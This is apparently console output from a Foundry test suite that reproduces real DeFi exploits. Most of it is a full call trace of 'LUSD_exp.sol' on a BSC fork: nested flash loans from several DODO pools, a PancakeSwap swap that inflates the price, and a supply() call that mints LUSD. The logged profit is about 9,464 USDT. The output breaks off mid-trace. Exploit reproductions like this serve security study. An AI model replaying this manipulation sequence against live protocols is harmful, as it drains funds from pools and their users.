Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.22s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-07/LUSD_exp.sol:68:31:
   |
68 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                               ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-07/LUSD_exp.sol:68:47:
   |
68 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                               ^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-07/LUSD_exp.sol:68:88:
   |
68 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                                                                        ^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-07/LUSD_exp.sol:92:26:
   |
92 |     function pancakeCall(address _sender, uint256 _amount0, uint256 _amount1, bytes calldata _data) external {
   |                          ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-07/LUSD_exp.sol:92:43:
   |
92 |     function pancakeCall(address _sender, uint256 _amount0, uint256 _amount1, bytes calldata _data) external {
   |                                           ^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-07/LUSD_exp.sol:92:61:
   |
92 |     function pancakeCall(address _sender, uint256 _amount0, uint256 _amount1, bytes calldata _data) external {
   |                                                             ^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-07/LUSD_exp.sol:92:79:
   |
92 |     function pancakeCall(address _sender, uint256 _amount0, uint256 _amount1, bytes calldata _data) external {
   |                                                                               ^^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 985.48ms (1.74ms CPU time)

Ran 1 test for src/test/2023-07/LUSD_exp.sol:LUSDTEST
[PASS] testSkim() (gas: 1077742)
Logs:
  Attacker BEP20USDT balance before attack: 0.000000000000000000
  Attacker BEP20USDT balance after attack: 9464.716730420359231245

Traces:
  [29737] LUSDTEST::setUp()
    ├─ [0] VM::createSelectFork("bsc", 29756866 [2.975e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(BEP20USDT: [0x55d398326f99059fF775485246999027B3197955], "BEP20USDT")
    │   └─ ← [Return]
    ├─ [0] VM::label(DPPOracle1: [0x26d0c625e5F5D6de034495fbDe1F6e9377185618], "DPPOracle1")
    │   └─ ← [Return]
    ├─ [0] VM::label(DPPOracle2: [0xFeAFe253802b77456B4627F8c2306a9CeBb5d681], "DPPOracle2")
    │   └─ ← [Return]
    ├─ [0] VM::label(DPPOracle3: [0x9ad32e3054268B849b84a8dBcC7c8f7c52E4e69A], "DPPOracle3")
    │   └─ ← [Return]
    ├─ [0] VM::label(DPP: [0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476], "DPP")
    │   └─ ← [Return]
    ├─ [0] VM::label(DPPAdvanced: [0x81917eb96b397dFb1C6000d28A5bc08c0f05fC1d], "DPPAdvanced")
    │   └─ ← [Return]
    ├─ [0] VM::label(Router: [0x10ED43C718714eb63d5aA57B78B54704E256024E], "Router")
    │   └─ ← [Return]
    ├─ [0] VM::label(CakeLP: [0x3F803EC2b816Ea7F06EC76aA2B6f2532F9892d62], "CakeLP")
    │   └─ ← [Return]
    └─ ← [Stop]

  [1257042] LUSDTEST::testSkim()
    ├─ [2531] BEP20USDT::balanceOf(LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 10000000000000000 [1e16]
    ├─ [0] VM::record()
    │   └─ ← [Return]
    ├─ [531] BEP20USDT::balanceOf(LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 10000000000000000 [1e16]
    ├─ [0] VM::accesses(BEP20USDT: [0x55d398326f99059fF775485246999027B3197955])
    │   └─ ← [Return] [0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96], []
    ├─ [0] VM::load(BEP20USDT: [0x55d398326f99059fF775485246999027B3197955], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000002386f26fc10000
    ├─ [0] VM::load(BEP20USDT: [0x55d398326f99059fF775485246999027B3197955], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000002386f26fc10000
    ├─ [531] BEP20USDT::balanceOf(LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 10000000000000000 [1e16]
    ├─ [0] VM::store(BEP20USDT: [0x55d398326f99059fF775485246999027B3197955], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   └─ ← [Return]
    ├─ [531] BEP20USDT::balanceOf(LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::store(BEP20USDT: [0x55d398326f99059fF775485246999027B3197955], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0x000000000000000000000000000000000000000000000000002386f26fc10000)
    │   └─ ← [Return]
    ├─ emit SlotFound(who: BEP20USDT: [0x55d398326f99059fF775485246999027B3197955], fsig: 0x70a08231, keysHash: 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03, slot: 81201235000773904770131445719184449197250777359516868712991521815545917127830 [8.12e76])
    ├─ [0] VM::load(BEP20USDT: [0x55d398326f99059fF775485246999027B3197955], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000002386f26fc10000
    ├─ [0] VM::store(BEP20USDT: [0x55d398326f99059fF775485246999027B3197955], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   └─ ← [Return]
    ├─ [531] BEP20USDT::balanceOf(LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [531] BEP20USDT::balanceOf(LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [2425] BEP20USDT::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "Attacker BEP20USDT balance before attack", val: 0, decimals: 18)
    ├─ [2531] BEP20USDT::balanceOf(DPPOracle1: [0x26d0c625e5F5D6de034495fbDe1F6e9377185618]) [staticcall]
    │   └─ ← [Return] 980925880461681526369519 [9.809e23]
    ├─ [963186] DPPOracle1::flashLoan(0, 980925880461681526369519 [9.809e23], LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x00)
    │   ├─ [6071] BEP20USDT::transfer(LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 980925880461681526369519 [9.809e23])
    │   │   ├─ emit Transfer(from: DPPOracle1: [0x26d0c625e5F5D6de034495fbDe1F6e9377185618], to: LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 980925880461681526369519 [9.809e23])
    │   │   ├─  storage changes:
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000000cfb8193967d8168cecef
    │   │   │   @ 0xf293ac4f2016c12f970d35cabe52ede86e940214b15208a1107f43cb9557cf4a: 0x00000000000000000000000000000000000000000000cfb8193967d8168cecef → 0
    │   │   └─ ← [Return] true
    │   ├─ [933278] LUSDTEST::DPPFlashLoanCall(LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 980925880461681526369519 [9.809e23], 0x00)
    │   │   ├─ [2531] BEP20USDT::balanceOf(DPPOracle2: [0xFeAFe253802b77456B4627F8c2306a9CeBb5d681]) [staticcall]
    │   │   │   └─ ← [Return] 972580983084971821937898 [9.725e23]
    │   │   ├─ [918194] DPPOracle2::flashLoan(0, 972580983084971821937898 [9.725e23], LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x00)
    │   │   │   ├─ [6071] BEP20USDT::transfer(LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 972580983084971821937898 [9.725e23])
    │   │   │   │   ├─ emit Transfer(from: DPPOracle2: [0xFeAFe253802b77456B4627F8c2306a9CeBb5d681], to: LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 972580983084971821937898 [9.725e23])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xa1bb3ea675b840e963c59cc969a45ddfeefd63ae58d64dc7dba145305988350c: 0x00000000000000000000000000000000000000000000cdf3b88258e34788b4ea → 0
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000cfb8193967d8168cecef → 0x000000000000000000000000000000000000000000019dabd1bbc0bb5e15a1d9
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [888280] LUSDTEST::DPPFlashLoanCall(LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 972580983084971821937898 [9.725e23], 0x00)
    │   │   │   │   ├─ [2531] BEP20USDT::balanceOf(DPPOracle3: [0x9ad32e3054268B849b84a8dBcC7c8f7c52E4e69A]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 996035460401357770516820 [9.96e23]
    │   │   │   │   ├─ [873026] DPPOracle3::flashLoan(0, 996035460401357770516820 [9.96e23], LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x00)
    │   │   │   │   │   ├─ [6071] BEP20USDT::transfer(LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 996035460401357770516820 [9.96e23])
    │   │   │   │   │   │   ├─ emit Transfer(from: DPPOracle3: [0x9ad32e3054268B849b84a8dBcC7c8f7c52E4e69A], to: LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 996035460401357770516820 [9.96e23])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xe15794f9863f61e2b79c6824f1e1c5aa8ab443721329bf1566a811b7d14c4bd5: 0x00000000000000000000000000000000000000000000d2eb30c4bcfe8130e954 → 0
    │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000019dabd1bbc0bb5e15a1d9 → 0x00000000000000000000000000000000000000000002709702807db9df468b2d
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [840618] LUSDTEST::DPPFlashLoanCall(LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 996035460401357770516820 [9.96e23], 0x00)
    │   │   │   │   │   │   ├─ [2531] BEP20USDT::balanceOf(DPP: [0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 80262899024076070546678 [8.026e22]
    │   │   │   │   │   │   ├─ [825194] DPP::flashLoan(0, 80262899024076070546678 [8.026e22], LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x00)
    │   │   │   │   │   │   │   ├─ [822495] 0x85351262f7474Ebe23FfAcD633cf20A491F1325D::flashLoan(0, 80262899024076070546678 [8.026e22], LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x00) [delegatecall]
    │   │   │   │   │   │   │   │   ├─ [6071] BEP20USDT::transfer(LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 80262899024076070546678 [8.026e22])
    │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: DPP: [0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476], to: LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 80262899024076070546678 [8.026e22])
    │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   @ 0x82bcc9253272a2176c253e21a54ca24177e771a367828bd1251261eb930b899c: 0x0000000000000000000000000000000000000000000010ff0f7b43552d0d6cf6 → 0
    │   │   │   │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000002709702807db9df468b2d → 0x00000000000000000000000000000000000000000002819611fbc10f0c53f823
    │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   ├─ [792498] LUSDTEST::DPPFlashLoanCall(LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 80262899024076070546678 [8.026e22], 0x00)
    │   │   │   │   │   │   │   │   │   ├─ [2531] BEP20USDT::balanceOf(DPPAdvanced: [0x81917eb96b397dFb1C6000d28A5bc08c0f05fC1d]) [staticcall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 494306161149541726286277 [4.943e23]
    │   │   │   │   │   │   │   │   │   ├─ [776904] DPPAdvanced::flashLoan(0, 494306161149541726286277 [4.943e23], LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x00)
    │   │   │   │   │   │   │   │   │   │   ├─ [774205] 0x7f60701206F85354147806a846CE59Bb7467ac53::flashLoan(0, 494306161149541726286277 [4.943e23], LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x00) [delegatecall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [6071] BEP20USDT::transfer(LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 494306161149541726286277 [4.943e23])
    │   │   │   │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: DPPAdvanced: [0x81917eb96b397dFb1C6000d28A5bc08c0f05fC1d], to: LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 494306161149541726286277 [4.943e23])
    │   │   │   │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0x67306574ccf1a1cf42cc6d75cb83db2ef4d9176c23c126cb883f7d78e16b109e: 0x0000000000000000000000000000000000000000000068ac64043b393497f1c5 → 0
    │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000002819611fbc10f0c53f823 → 0x00000000000000000000000000000000000000000002ea4275fffc4840ebe9e8
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   │   │   │   ├─ [741708] LUSDTEST::DPPFlashLoanCall(LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 494306161149541726286277 [4.943e23], 0x00)
    │   │   │   │   │   │   │   │   │   │   │   │   ├─ [24562] BEP20USDT::approve(Router: [0x10ED43C718714eb63d5aA57B78B54704E256024E], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ emit Approval(owner: LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: Router: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   │   │   │   │   ├─ [79774] CakeLP::swap(0, 1246953598313175025 [1.246e18], LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x307830)
    │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ [29971] 0x7130d2A12B9BCbFAe4f2634d864A1Ee1Ce3Ead9c::transfer(LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1246953598313175025 [1.246e18])
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: CakeLP: [0x3F803EC2b816Ea7F06EC76aA2B6f2532F9892d62], to: LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1246953598313175025 [1.246e18])
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x000000000000000000000000000000000000000000000000114e11b0e6da17f1
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0x62ca9b0aeef72297e6bc0479f5dbe36f0cb718b72e053d6f5b24b1c35992691a: 0x000000000000000000000000000000000000000000000000122a24669abf993c → 0x00000000000000000000000000000000000000000000000000dc12b5b3e5814b
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ [10375] LUSDTEST::pancakeCall(LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 1246953598313175025 [1.246e18], 0x307830)
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ [8071] BEP20USDT::transfer(CakeLP: [0x3F803EC2b816Ea7F06EC76aA2B6f2532F9892d62], 800000000000000000000000 [8e23])
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: CakeLP: [0x3F803EC2b816Ea7F06EC76aA2B6f2532F9892d62], value: 800000000000000000000000 [8e23])
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000002ea4275fffc4840ebe9e8 → 0x0000000000000000000000000000000000000000000240da5fc0f1f08cebe9e8
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0x62ca9b0aeef72297e6bc0479f5dbe36f0cb718b72e053d6f5b24b1c35992691a: 0x00000000000000000000000000000000000000000000086504088c8cc730d2d0 → 0x00000000000000000000000000000000000000000000b1cd1a4796e47b30d2d0
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ [531] BEP20USDT::balanceOf(CakeLP: [0x3F803EC2b816Ea7F06EC76aA2B6f2532F9892d62]) [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 839642343651114056995536 [8.396e23]
    │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ [531] 0x7130d2A12B9BCbFAe4f2634d864A1Ee1Ce3Ead9c::balanceOf(CakeLP: [0x3F803EC2b816Ea7F06EC76aA2B6f2532F9892d62]) [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 61945066492887371 [6.194e16]
    │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ emit Sync(reserve0: 839642343651114056995536 [8.396e23], reserve1: 61945066492887371 [6.194e16])
    │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ emit Swap(sender: LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 800000000000000000000000 [8e23], amount1In: 0, amount0Out: 0, amount1Out: 1246953598313175025 [1.246e18], to: LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 10: 0x000000000000000000000000021e75bb0a9a9c99e40a1777a39d8103cd1e1273 → 0x000000000000000000000000021e76ec0dbe5c645ab167f0953c2e6c8a76e087
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 9: 0x00000000000000000000000000000000095a3011fc4751f68e859e8d790e4dba → 0x00000000000000000000000000000000095a35a61ff02754d82010346bc19e96
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 8: 0x64a81d97000000000000122a24669abf993c00000000086504088c8cc730d2d0 → 0x64a8202b00000000000000dc12b5b3e5814b00000000b1cd1a4796e47b30d2d0
    │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   │   │   │   │   │   ├─ [24562] 0x7130d2A12B9BCbFAe4f2634d864A1Ee1Ce3Ead9c::approve(0xdeC12a1dCbC1F741cCD02dFd862ab226F6383003, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ emit Approval(owner: LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xdeC12a1dCbC1F741cCD02dFd862ab226F6383003, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0x46ef40e8696b8cff1b33c02c95eb534a07a585e0da9f344852ee19d2ab660c25: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   │   │   │   │   ├─ [297973] 0xdeC12a1dCbC1F741cCD02dFd862ab226F6383003::supply(0x7130d2A12B9BCbFAe4f2634d864A1Ee1Ce3Ead9c, 1515366635982742 [1.515e15])
    │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ [5151] Router::getAmountsOut(1515366635982742 [1.515e15], [0x7130d2A12B9BCbFAe4f2634d864A1Ee1Ce3Ead9c, 0x55d398326f99059fF775485246999027B3197955]) [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ [893] CakeLP::getReserves() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 839642343651114056995536 [8.396e23], 61945066492887371 [6.194e16], 1688739883 [1.688e9]
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] [1515366635982742 [1.515e15], 20000822364585607560066 [2e22]]
    │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ [27934] 0x7130d2A12B9BCbFAe4f2634d864A1Ee1Ce3Ead9c::transferFrom(LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xdeC12a1dCbC1F741cCD02dFd862ab226F6383003, 1515366635982742 [1.515e15])
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xdeC12a1dCbC1F741cCD02dFd862ab226F6383003, value: 1515366635982742 [1.515e15])
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ emit Approval(owner: LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xdeC12a1dCbC1F741cCD02dFd862ab226F6383003, value: 115792089237316195423570985008687907853269984665640564039457582492546493657193 [1.157e77])
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000000114e11b0e6da17f1 → 0x0000000000000000000000000000000000000000000000001148af791ccf485b
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0x71b334f8cb2d24e6ac3bfdf1ecedca81e77e0b98128a89797b533049c83c027a: 0 → 0x00000000000000000000000000000000000000000000000000056237ca0acf96
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0x46ef40e8696b8cff1b33c02c95eb534a07a585e0da9f344852ee19d2ab660c25: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffffffffffffffa9dc835f53069
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ [31940] 0x3cD632C25A4Db4c1A636cFb23B9285Be1097A60d::mint(LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 10000411182292803780033 [1e22])
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 10000411182292803780033 [1e22])
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x00000000000000000000000000000000000000000000021e1f9599d896bffdc1
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   │   @ 2: 0x000000000000000000000000000000000000000000001dfa39c09e796556e80b → 0x00000000000000000000000000000000000000000000201859563851fc16e5cc
    │   │   │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   │   │   │   │   │   │   ├─  emit topic 0: 0x14cd9738a3fc2fd3ff5d3a22f4d52002207f95efd39db5501c9b9297d010cf67
    │   │   │   │   │   │   │   │   │   │   │   │   │   │        topic 1: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
